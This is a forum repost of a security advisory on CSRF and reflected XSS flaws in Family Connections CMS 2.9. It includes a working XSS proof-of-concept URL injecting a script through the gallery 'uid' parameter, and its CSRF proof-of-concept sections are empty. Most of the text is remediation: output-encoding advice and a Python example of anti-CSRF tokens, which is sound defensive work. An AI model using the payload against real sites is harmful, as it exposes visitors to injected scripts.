wanghe513120 posted on 2012-6-26 12:59:44

Multiple vulnerabilities in Family CMS 2.9 and earlier, with fixes

Title: Family CMS 2.9 and earlier multiple vulnerabilities
Download: http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download
Author: Ahmed Elhady Mohamed www.2cto.com ahmed.elhady.mohamed@gmail.com
Affected version: 2.9
Tested on: Ubuntu 11.4
===================================================================================
Note:
*****All optional sections must be installed during the installation process first.*****
1- CSRF vulnerability:
POC 1: Page "familynews.php"

--------------------------------------------------------------------------------------------------------
POC 2: Page "prayers.php"

----------------------------------------------------------------------------------------------------------------------------
2- Reflected XSS
POC: http:///fcms_2.9/gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
Fix: strengthen input filtering and validation. For the reflected XSS, encode the uid value for its HTML context before it is written into the page; for the CSRF issues, require a per-session anti-CSRF token on the state-changing forms in familynews.php and prayers.php and reject any POST that does not carry it.
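The two fixes described above, as an added example that is not Family Connections' own PHP code: a minimal Python handler reflects the advisory's exact uid payload unescaped (the vulnerable behaviour) beside an output-encoded version, and a synchronizer-token check of the kind the CSRF fix calls for. The function names, the hidden-field markup, and the session/form dictionaries are assumptions for illustration; the request URL in the usage call is constructed, with a placeholder host.

```python
"""Added example (not the CMS's code): reflected-XSS output encoding and an
anti-CSRF token check, modelled on the flaws in the advisory above."""
import hmac
import html
import secrets
from urllib.parse import parse_qs, urlsplit

# The advisory's PoC payload, URL-decoded: the leading quote closes the
# attribute the value lands in, then <script> runs.
XSS_PAYLOAD = '"><script>alert(/xss/)</script>'


def uid_from_url(url: str) -> str:
    """Extract the uid query parameter the way the PoC URL delivers it."""
    return parse_qs(urlsplit(url).query).get("uid", [""])[0]


def render_gallery_vulnerable(uid: str) -> str:
    """Assumed vulnerable pattern: uid is interpolated into markup verbatim."""
    return f'<input type="hidden" name="uid" value="{uid}">'


def render_gallery_fixed(uid: str) -> str:
    """Hardened form: encode for the HTML attribute context. quote=True also
    escapes " and ', so the payload can no longer break out of value=""."""
    return f'<input type="hidden" name="uid" value="{html.escape(uid, quote=True)}">'


# --- CSRF: synchronizer-token pattern ----------------------------------
# The server binds a random token to the session, embeds it in every
# state-changing form, and refuses POSTs that do not echo it back. A forged
# cross-site form cannot read the victim's token, so it fails the check.

def issue_csrf_token(session: dict) -> str:
    """Mint a fresh token and store it in the (assumed) server-side session."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def handle_post_vulnerable(form: dict) -> bool:
    """Assumed original behaviour: any well-formed POST is accepted."""
    return "title" in form


def handle_post_fixed(session: dict, form: dict) -> bool:
    """Accept the POST only if it carries the session's token.
    The comparison is constant-time so the token cannot leak via timing."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not isinstance(supplied, str):
        return False
    return "title" in form and hmac.compare_digest(expected, supplied)


if __name__ == "__main__":
    # Constructed request URL; the host is a placeholder.
    poc = ("http://example.invalid/fcms_2.9/gallery/index.php"
           "?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E")
    uid = uid_from_url(poc)
    print("vulnerable:", render_gallery_vulnerable(uid))
    print("fixed:     ", render_gallery_fixed(uid))

    session = {}
    token = issue_csrf_token(session)
    forged = {"title": "posted by attacker"}            # no token: cross-site form
    legit = {"title": "family news", "csrf_token": token}
    print("vulnerable handler accepts forged POST:", handle_post_vulnerable(forged))
    print("fixed handler accepts forged POST:     ", handle_post_fixed(session, forged))
    print("fixed handler accepts legit POST:      ", handle_post_fixed(session, legit))
```

The token must be generated per session (or per form) with a CSPRNG and compared in constant time; a static site-wide token or a comparison with `==` would defeat the purpose. Output encoding belongs at the point of output, chosen for the context (attribute, element body, JavaScript string), not as a generic "filter" on input.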
